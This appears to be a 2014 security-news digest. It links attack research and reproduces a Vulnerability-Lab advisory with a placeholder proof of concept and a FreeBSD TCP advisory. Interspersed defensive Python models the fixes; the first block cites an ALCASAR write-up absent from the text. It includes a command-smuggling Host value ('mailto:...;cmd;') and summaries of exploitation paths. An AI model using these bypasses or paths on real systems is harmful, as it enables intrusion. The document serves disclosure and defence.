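To make the write-up's point about the 2.8.1 patch concrete from the defender's side, here is an added Python example (not part of the original exploit or of ALCASAR): a scheme-based URL check, approximating the described filter_var(FILTER_VALIDATE_URL) behaviour with urlparse, next to a strict allowlist validator for the Host header. The names in ALLOWED_HOSTS and the sample values other than the three quoted in the write-up are constructed.

```python
import re
from urllib.parse import urlparse

# Constructed allowlist: the names this portal is actually served under.
ALLOWED_HOSTS = {"portal.example.local", "192.0.2.10"}

# The three values from the write-up plus constructed ones.
SAMPLE_HOST_HEADERS = [
    "www.google.com",               # rejected by filter_var (no scheme)
    "http://www.google.com",        # accepted by filter_var, never a real Host value
    "mailto:email@valid.tld;cmd;",  # the bypass named in the write-up
    "portal.example.local",         # constructed: legitimate
    "PORTAL.example.local:443",     # constructed: legitimate, with port
    "portal.example.local;id",      # constructed: shell metacharacter
]


def weak_url_check(value):
    """Models the 2.8.1 patch: accept anything that parses as a URL with a scheme.

    FILTER_VALIDATE_URL requires a scheme, so a bare host name fails while
    "mailto:..." passes. urlparse() stands in for the PHP filter here; it is
    an approximation of the behaviour described, not the PHP implementation.
    """
    return urlparse(value).scheme != ""


# RFC 1123 label: letters, digits, hyphen; no leading or trailing hyphen; 1-63 chars.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
_HOST_RE = re.compile(
    r"^(?P<host>" + _LABEL + r"(?:\." + _LABEL + r")*)"
    r"(?::(?P<port>[0-9]{1,5}))?\Z"
)


def strict_host_check(value, allowed_hosts=ALLOWED_HOSTS):
    """Allowlist validation for an HTTP Host header value.

    Syntax first: host name labels as above, at most 253 chars, plus an
    optional numeric port in 1..65535. A scheme, a path, ';' or any other
    shell metacharacter cannot match. Then semantics: the host must be one
    the server is configured to answer for, so even a well-formed foreign
    name is rejected.
    """
    m = _HOST_RE.match(value)
    if m is None or len(m.group("host")) > 253:
        return False
    port = m.group("port")
    if port is not None and not 1 <= int(port) <= 65535:
        return False
    return m.group("host").lower() in allowed_hosts


def compare_checks(values=SAMPLE_HOST_HEADERS):
    """Run both checks over the samples; returns {value: (weak, strict)}."""
    return {v: (weak_url_check(v), strict_host_check(v)) for v in values}


if __name__ == "__main__":
    for value, (weak, strict) in compare_checks().items():
        print("%-32r weak=%-5s strict=%s" % (value, weak, strict))
```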



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Archie: Just another Exploit kit

We have previously described how Exploit Kits are some of the favorite techniques used by cybercriminals to install malicious software on victims' systems. The number of Exploit Kits available has experienced exponential growth in the last few years. Since Blackhole’s author was arrested in 2013, the number of Exploit Kits has increased - including Neutrino, Magnitude, Nuclear, Rig and Angler. In this blog post we discuss Archie, an Exploit Kit that was first discovered by William Metcalf at EmergingThreats. Archie is a really basic Exploit Kit that uses different exploit modules copied from the Metasploit Framework.

more here...........http://www.alienvault.com/open-threat-exchange/blog/archie-just-another-exploit-kit

Introducing paste searches and monitoring for “Have I been pwned?”

I’ve got 174,451,409 breached accounts in Have I been pwned? (HIBP) as of today which probably sounds like a lot, but it’s not. Why is it not a lot? Because whilst that list spans a lot of the big breaches I could get my hands on, as of the middle of this year (now a couple of months ago already), there were over half a billion accounts breached in just six months. That’s just nuts and as that article explains, it’s set us on a track that will make 2014 the most hacked year to date by a fairly significant margin over last year which was the previous most hacky year.

more here...........http://www.troyhunt.com/2014/09/introducing-paste-searches-and.html

Beyond Automated Unpacking: Extracting Decrypted/Decompressed Memory Blocks

It’s been about a year and a half since I wrote about a behavioural approach to automated unpacking, and I figured it was time to add some more functionality to unpack.py. This time, I’m going to look at malware decrypting/decompressing code from within itself, and process hollowing, and see if we can capture the decrypted/decompressed/newly written memory. Let’s spruce unpack.py up a tad.

more here...........http://malwaremusings.com/2014/09/16/beyond-automated-unpacking-extracting-decrypteddecompressed-memory-blocks/

OS X IOKit kernel code execution due to controlled kmem_free size in IOSharedDataQueue

IOSharedDataQueue is used by OS X kernel drivers to implement a user/kernel queue in shared memory.

The memory which is mapped into userspace is represented by the variable-sized struct IODataQueueMemory:

typedef struct _IODataQueueMemory {
      UInt32 queueSize;
      volatile UInt32 head;
      volatile UInt32 tail;
      IODataQueueEntry queue[1];
} IODataQueueMemory;

This is allocated on the kernel heap with IOMallocAligned (the size is rounded up to the nearest page_size multiple.) This size is stored in the queueSize field.

Kernel code can call IOSharedDataQueue::getMemoryDescriptor to wrap these pages in an IOMemoryDescriptor which can then be mapped into the userspace task (via IOConnectMapMemory.)

When the IOSharedDataQueue is destructed its ::free method passes the queueSize to kmem_free, which simply removes the corresponding number of pages from the kernel_map. If userspace increased the value of the queueSize field this will remove more pages than were allocated - potentially removing other live allocations from the map.

This could be leveraged for code execution by, for example, forcing these free pages to be reallocated with controlled data before they are accessed.



more here.............https://code.google.com/p/google-security-research/issues/detail?id=35

USB&WiFi Flash Drive v1.3 iOS - Code Execution Vulnerability

Document Title:
===============
USB&WiFi Flash Drive v1.3 iOS - Code Execution Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1316


Release Date:
=============
2014-09-15


Vulnerability Laboratory ID (VL-ID):
====================================
1316


Common Vulnerability Scoring System:
====================================
9


Product & Service Introduction:
===============================
The app takes advantage of the free space of the iPhone to store vast amounts of files. It supports both wireless and USB transfer.
Compatible with Windows 7, Windows XP, Windows Vista, Mac OS 10+ and Linux. It's also an ALL-IN-1 reader and file browser. Images, videos,
music and documents are all supported: jpg, jpeg, png, tiff, tif, bmp, BMPf, ico, cur, xbm, mov, mp4, mpv, 3gp, aac, adts, ac3, aif, aiff, aifc,
caf, mp3, mp4, m4a, m4r, snd, au, sd2, wav, doc, xls, ppt, pdf, rtf, key, numbers, pages, gif, txt, html, htm.

( Copy of the Homepage: https://itunes.apple.com/us/app/usb-wi-fi-flash-drive-free/id503106759 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a code execution vulnerability in the official USB & Wi-Fi Flash Drive v1.3 iOS mobile web-application.


Vulnerability Disclosure Timeline:
==================================
2014-09-15: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Leping Li
Product: USB & Wi-Fi Flash Drive - iOS Mobile Web Application (Wifi) 1.3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
A remote code execution web vulnerability has been discovered in the official USB & Wi-Fi Flash Drive v1.3 iOS mobile web-application.
The vulnerability allows remote attackers to execute their own system (device) specific code to compromise the iOS mobile application.

The remote code execution vulnerability is located in the name value of the cgi/newfolder/ function module. Remote attackers are able to
execute system specific code through the GET request of the insecure add `new folder` function. The execution takes place through
the name value of the listed items and occurs in the index file manager listing of the Wi-Fi flash drive mobile application.
There is no input filter or protection mechanism that would need to be bypassed to provoke the execution. The attack vector
of the issue is located on the application side (persistent) and the request method used to inject the code is GET.

The security risk of the code execution vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.9.
Exploitation of the code execution vulnerability requires no privileged account or user interaction. Successful exploitation of the remote
vulnerability results in mobile application or device compromise.

Request Method(s):
                                [+] GET

Vulnerable Module(s):
                                [+] cgi/newfolder/

Vulnerable Parameter(s):
                                [+] name

Affected Module(s):
                                [+] WiFi File Manager


Proof of Concept (PoC):
=======================
The remote code execution web vulnerability can be exploited by remote attackers on the Wi-Fi network without user interaction or a privileged account.
For a security demonstration, or to reproduce the vulnerability, follow the information and steps provided below.

PoC: Wi-Fi Manager - Index Listing

<div id="photo_list_container" class="list" style="display: block;">
<ul id="photo_list" class="photocontainer"><li><a alt="1026" class="videolink" href="###">
<img style="width: 120px; height: 120px;" onload="autoResizePhotoThumb(this);" src="/cgi/thumb/1026"></a>
<span class="namespan">[CODE EXECUTION IN DIRECTORY PATH VALUE!]%3E</span><span class="downloadspan">
<a target="_blank" href="/fd-down/cgi/download/1026/[CODE EXECUTION IN DIRECTORY PATH VALUE!]%3E"><img src="/img/download.png"></a></span></li>
<li><a alt="1027" class="videolink" href="###"><img style="width: 120px; height: 120px;" onload="autoResizePhotoThumb(this);" src="/cgi/thumb/1027"></a>
<span class="namespan">[CODE EXECUTION IN DIRECTORY PATH VALUE!]%3E></span><span class="downloadspan">
<a target="_blank" href="/fd-down/cgi/download/1027/asdasdasd <[CODE EXECUTION IN DIRECTORY PATH VALUE!]%3E>">
<img src="/img/download.png"></a></span></li></iframe></span></li>
<li><a alt="1028" class="videolink" href="###"><img style="width: 120px; height: 120px;" onload="autoResizePhotoThumb(this);" src="/cgi/thumb/1028"></a>
<span class="namespan">[CODE EXECUTION IN DIRECTORY PATH VALUE!]%3E <[CODE EXECUTION IN DIRECTORY PATH VALUE!]%3E"></span><span class="downloadspan">
<a target="_blank" href="/fd-down/cgi/download/1028/[CODE EXECUTION IN DIRECTORY PATH VALUE!]%3E>"><img src="/img/download.png"></a></span></li></iframe></span></li></ul>
<div class="pagecontrol"><p id="page_control">1</p></div></div></div></div><div class="footer"><p>©2011- Wi-Fi Manager</p></div></div>


--- PoC Session Logs [GET] (EXEC CGI) ---
Status: 200[OK]
 GET http://ipad.localhost:8080/cgi/newfolder/[CODE EXECUTION IN DIRECTORY PATH VALUE!]%3E?0.7475382169664659 Load Flags[LOAD_BACKGROUND  ] Größe des Inhalts[12] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[ipad.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[application/json, text/javascript, */*]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      X-Requested-With[XMLHttpRequest]
      Referer[http://ipad.localhost:8080/]
      Connection[keep-alive]
   Response Header:
      Content-Length[12]
      Connection[close]

Status: 200[OK]
GET http://ipad.localhost:8080/[CODE EXECUTION IN DIRECTORY PATH VALUE!] Load Flags[LOAD_DOCUMENT_URI  ] Größe des Inhalts[916] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[ipad.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://ipad.localhost:8080/]
      Connection[keep-alive]
   Response Header:
      Content-Length[916]
      Connection[close]



Reference(s):
http://ipad.localhost:8080/cgi/newfolder/
http://ipad.localhost:8080/cgi/
http://ipad.localhost:8080/


Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing and encoding the new folder name input in the cgi path. Restrict and filter the name input to prevent code
execution through the path values of the application. Also encode and filter the name value on output in the Wi-Fi file manager index item listing module to prevent exploitation.
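As an added example that is not part of the advisory or the vendor's code, the fix described above in Python: a strict allowlist on the submitted folder name, and separate encoding of that name for the two places the listing puts it (the namespan text node and the download href path segment). The item ids and sample names are constructed.

```python
import html
import re
from urllib.parse import quote

# Names a client might submit to cgi/newfolder/<name>; constructed samples,
# not taken from the advisory (which only shows a placeholder marker).
SAMPLE_NAMES = [
    "Holiday 2014",
    'Docs <b>&</b> "stuff"',   # markup and quotes
    "../private",              # path traversal attempt
    "a" * 300,                 # oversized
    "report\x00.pdf",          # embedded NUL
]

# Input allowlist: printable ASCII subset, must start with a letter or digit, 1-64 chars.
_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9 ._()-]{0,63}\Z")


def validate_folder_name(name):
    """Input side: strict allowlist for a new folder name. Returns (ok, reason)."""
    if not _NAME_RE.match(name):
        return False, "name must be 1-64 chars from letters, digits, space, . _ ( ) -"
    if ".." in name or name.endswith("."):
        return False, "dot sequences are not allowed"
    return True, ""


def render_listing_entry(item_id, name):
    """Output side: encode the name once per context it lands in.

    In the advisory's listing the name appears as element text inside
    <span class="namespan"> and as a path segment in the download href.
    Each context needs its own encoding: HTML entity escaping for the text
    node, percent-encoding (with '/' encoded too) for the URL path segment.
    """
    text = html.escape(name, quote=True)
    segment = quote(name, safe="")
    return (
        '<li><span class="namespan">%s</span>'
        '<a href="/fd-down/cgi/download/%d/%s">download</a></li>' % (text, item_id, segment)
    )


def handle_newfolder(item_id, raw_name):
    """Validate first, then render; rejected names never reach the listing."""
    ok, reason = validate_folder_name(raw_name)
    if not ok:
        return {"accepted": False, "reason": reason, "html": ""}
    return {"accepted": True, "reason": "", "html": render_listing_entry(item_id, raw_name)}


if __name__ == "__main__":
    for item_id, name in enumerate(SAMPLE_NAMES, start=1026):
        print(handle_newfolder(item_id, name))
```

Output encoding is kept even though the validator already rejects markup characters: the two layers protect different sinks and one may be relaxed later without the other noticing.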


Security Risk:
==============
The security risk of the code execution web vulnerability in the new folder cgi module is estimated as critical.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    dev.vulnerability-db.com            - forum.vulnerability-db.com                            - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

Denial of Service in TCP packet processing

=============================================================================
FreeBSD-SA-14:19.tcp Security Advisory
The FreeBSD Project

Topic: Denial of Service in TCP packet processing

Category: core
Module: inet
Announced: 2014-09-16
Credits: Jonathan Looney (Juniper SIRT)
Affects: All supported versions of FreeBSD.
Corrected: 2014-09-16 09:48:35 UTC (stable/10, 10.1-PRERELEASE)
2014-09-16 09:48:35 UTC (stable/10, 10.1-BETA1-p1)
2014-09-16 09:50:19 UTC (releng/10.0, 10.0-RELEASE-p9)
2014-09-16 09:49:11 UTC (stable/9, 9.3-STABLE)
2014-09-16 09:50:19 UTC (releng/9.3, 9.3-RELEASE-p2)
2014-09-16 09:50:19 UTC (releng/9.2, 9.2-RELEASE-p12)
2014-09-16 09:50:19 UTC (releng/9.1, 9.1-RELEASE-p19)
2014-09-16 09:49:11 UTC (stable/8, 8.4-STABLE)
2014-09-16 09:50:19 UTC (releng/8.4, 8.4-RELEASE-p16)
CVE Name: CVE-2004-0230

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:http://security.FreeBSD.org/>.

I. Background

The Transmission Control Protocol (TCP) of the TCP/IP protocol suite
provides a connection-oriented, reliable, sequence-preserving data
stream service. New TCP connections are initiated using a special SYN
flag in a datagram. Sequencing of data is controlled by 32-bit sequence
numbers that start with a random value and are increased using modulo
2**32 arithmetic. TCP endpoints maintain a window of expected, and
thus allowed, sequence numbers for a connection.

II. Problem Description

When a segment with the SYN flag for an already existing connection arrives,
the TCP stack tears down the connection, bypassing a check that the
sequence number in the segment is in the expected window.
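The missing check described above, modelled in an added Python example that is not part of the FreeBSD advisory or its patch: an in-window test with modulo 2**32 arithmetic, applied (patched) or skipped (unpatched) before a SYN on an established connection is allowed to tear it down. The connection state and the sequence numbers are constructed.

```python
MOD = 1 << 32  # TCP sequence numbers are 32-bit and compared modulo 2**32


def seq_in_window(seg_seq, rcv_nxt, rcv_wnd):
    """Acceptability test for a segment's sequence number.

    Computing the distance modulo 2**32 keeps the test correct when the
    expected window straddles the 2**32 - 1 -> 0 wrap-around.
    """
    return (seg_seq - rcv_nxt) % MOD < rcv_wnd


def handle_syn_on_established(seg_seq, rcv_nxt, rcv_wnd, patched):
    """Models a SYN arriving on an already established connection.

    Unpatched: the SYN tears the connection down without consulting the
    window, so any spoofed SYN that hits the right 4-tuple succeeds.
    Patched: the window check is applied first and an out-of-window SYN
    does not tear the connection down (modelled here as "DROP"; any reply
    the fixed stack may send is outside this model).
    Returns "RESET" or "DROP".
    """
    if patched and not seq_in_window(seg_seq, rcv_nxt, rcv_wnd):
        return "DROP"
    return "RESET"


# Constructed connection state: the window straddles the 2**32 wrap-around.
RCV_NXT = 0xFFFFFF00
RCV_WND = 65535

# Constructed SYN sequence numbers: two inside the window (one past the
# wrap), one far outside, one just below the window's start.
SAMPLE_SYNS = [0xFFFFFF10, 0x00000100, 0x12345678, 0xFFFFFEFF]


def classify(syns=SAMPLE_SYNS, rcv_nxt=RCV_NXT, rcv_wnd=RCV_WND):
    """Outcome per sample SYN for both stacks: {seq: (unpatched, patched)}."""
    return {
        s: (handle_syn_on_established(s, rcv_nxt, rcv_wnd, patched=False),
            handle_syn_on_established(s, rcv_nxt, rcv_wnd, patched=True))
        for s in syns
    }


if __name__ == "__main__":
    for seq, (before, after) in classify().items():
        print("SYN seq=0x%08X  unpatched=%-5s patched=%s" % (seq, before, after))
```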

III. Impact

An attacker who has the ability to spoof IP traffic can tear down a
TCP connection by sending only 2 packets, if they know both TCP port
numbers. In case one of the two port numbers is unknown, a successful
attack requires less than 2**17 packets spoofed, which can be
generated within less than a second on a decent connection to the
Internet.

IV. Workaround

It is possible to defend against these attacks with stateful traffic
inspection using a firewall. This can be done by enabling pf(4) on
the system and creating states for every connection. Even a default
ruleset to allow all traffic would be sufficient to mitigate this
issue.

V. Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch http://security.FreeBSD.org/patches/SA-14:19/tcp.patch
# fetch http://security.FreeBSD.org/patches/SA-14:19/tcp.patch.asc
# gpg --verify tcp.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

3) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

VI. Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/8/                                                         r271668
releng/8.4/                                                       r271669
stable/9/                                                         r271668
releng/9.1/                                                       r271669
releng/9.2/                                                       r271669
releng/9.3/                                                       r271669
stable/10/                                                        r271667
releng/10.0/                                                      r271669
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NNNNNN with the revision number, on a
machine with Subversion installed:

# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NNNNNN with the revision number:

<URL:http://svnweb.freebsd.org/base?view=revision&revision=NNNNNN>

VII. References

<URL:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0230>

The latest revision of this advisory is available at
<URL:http://security.FreeBSD.org/advisories/FreeBSD-SA-14:19.tcp.asc>

Rogue E-Books Could Pose Threat to Amazon Accounts

It seems there’s an issue Amazon Kindle owners should be aware of and take appropriate steps to avoid.

A security researcher discovered malicious code that could potentially be injected – and cookies stolen – via a stored cross site scripting attack on the Manage your Kindle page located on the Amazon website.

more here..........https://blog.malwarebytes.org/security-threat/2014/09/rogue-e-books-could-pose-threat-to-amazon-accounts/

Leveraging LFI To Get Full Compromise On WordPress Sites

In this post I will discuss how a serious but mostly ignored vulnerability can lead to a full compromise of a WordPress site. The key in this attack is how WordPress handles authentication, allowing a brute force attack if the secret salt and key values stored in wp-config.php are exposed. If an innocuous LFI (local file inclusion) or accidental leak of this data by a backup or copy of wp-config.php is successful, then an attacker could generate their own valid auth tokens and gain full access to the site’s admin pages without being detected.

more here...........http://blog.spiderlabs.com/2014/09/leveraging-lfi-to-get-full-compromise-on-wordpress-sites.html

Paper: Fine grain Cross-VM Attacks on Xen and VMware are possible!

This work exposes further vulnerabilities in virtualized cloud servers by mounting Cross-VM cache attacks in Xen and VMware VMs targeting AES running in the victim VM. Even though there exists a rich literature on cache attacks on AES, so far only a single work, demonstrating a working attack on an ARM platform running a L4Re virtualization layer, has been published. Here we show that AES in a number of popular cryptographic libraries including OpenSSL, PolarSSL and Libgcrypt is vulnerable to Bernstein’s correlation attack when run in Xen and VMware (bare metal version) VMs, the most popular VMs used by cloud service providers (CSP) such as Amazon and Rackspace. We also show that the vulnerability persists even if the VMs are placed on different cores in the same machine. The results of this study show that there is a great security risk to AES (and data encrypted under AES) on popular cloud services.


more here............https://eprint.iacr.org/2014/248.pdf

CVE-2014-6283: Privilege Escalation Vulnerability and Potential Remote Code Execution in SAP Adaptive Server Enterprise

On May 12, 2014, SAP published updates to Adaptive Server Enterprise versions 15.0, 15.5 and 15.7 on all platforms. These updates addressed a security flaw in a built-in procedure implementation. The flaw allows any authenticated database user to overwrite the master encryption key or execute arbitrary code in the database server process context. Below I will discuss in detail what happens inside the server when the vulnerable procedure is invoked.

more here..............http://blog.spiderlabs.com/2014/09/cve-2014-6283-sap-ase-missing-authorization-checks-and-arbitrary-code-execution.html